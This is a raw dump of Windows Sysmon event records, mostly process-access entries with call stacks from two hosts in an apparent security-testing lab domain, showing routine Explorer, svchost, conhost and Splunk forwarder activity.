08:04:23.105{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.074{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.074{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.074{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.074{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.058{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.058{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.058{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.058{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.043{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D452C862A80DE13A153ECD091B5C5BF,SHA256=A9B211394ED83B4C870B001B0ABDE7AD08A55157B84BD74D673A0B94464D6A79,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F788-60EB-C879-00000000D001}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:24.979{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.979{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F788-60EB-C879-00000000D001}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.979{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F788-60EB-C879-00000000D001}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.980{0C1E0330-F788-60EB-C879-00000000D001}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.463{0C1E0330-F788-60EB-C779-00000000D001}12203892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F788-60EB-C779-00000000D001}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 